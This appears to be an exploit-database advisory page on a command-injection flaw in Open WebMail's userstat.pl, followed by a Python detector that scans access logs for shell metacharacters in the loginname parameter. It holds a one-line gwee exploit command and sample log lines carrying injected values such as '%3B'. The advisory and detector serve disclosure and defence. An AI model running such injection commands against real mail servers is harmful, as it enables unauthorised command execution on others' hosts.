Arbitrary Command Execution in Open WebMail - exploit.company
vendor: Open WebMail
by: Unknown
CVSS: 7.5 HIGH
Arbitrary Command Execution
CWE: 78
Product Name: Open WebMail
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:open_webmail:open_webmail
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Arbitrary Command Execution in Open WebMail

A vulnerability in Open WebMail allows a remote attacker to execute arbitrary commands on a vulnerable host. The issue is caused by insufficient sanitization of shell metacharacters passed through URI parameters. By exploiting this vulnerability, a non-privileged user can remotely execute arbitrary commands in the context of the web server hosting the vulnerable application.

Mitigation: Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10316/info

A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.

Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl
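
A detection check for the request pattern above, as an added example (not part of the original advisory or of Open WebMail's code): it scans web server access-log lines for requests to userstat.pl whose URL-decoded loginname parameter contains shell metacharacters. The common/combined log format, the metacharacter set, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed set of characters a POSIX shell treats specially; none belongs in a login name.
SHELL_META = set(";|&`$<>(){}\\\n\r'\"*?!")

# Request field of a common/combined format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_loginname(log_line, script="userstat.pl", param="loginname"):
    """Return the decoded parameter value if it holds shell metacharacters, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if not parts.path.endswith("/" + script):
        return None
    # parse_qsl percent-decodes values, so %3B is compared as ';'
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == param and SHELL_META & set(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_loginname(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/openwebmail/userstat.pl?loginname=alice@example.com HTTP/1.0" 200 12',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/openwebmail/userstat.pl?loginname=%3B HTTP/1.0" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/openwebmail/openwebmail.pl?loginname=bob HTTP/1.0" 200 431',
    '192.0.2.77 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/openwebmail/userstat.pl?loginname=bob%7C HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: loginname contains shell metacharacters: {value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this check covers only query-string requests.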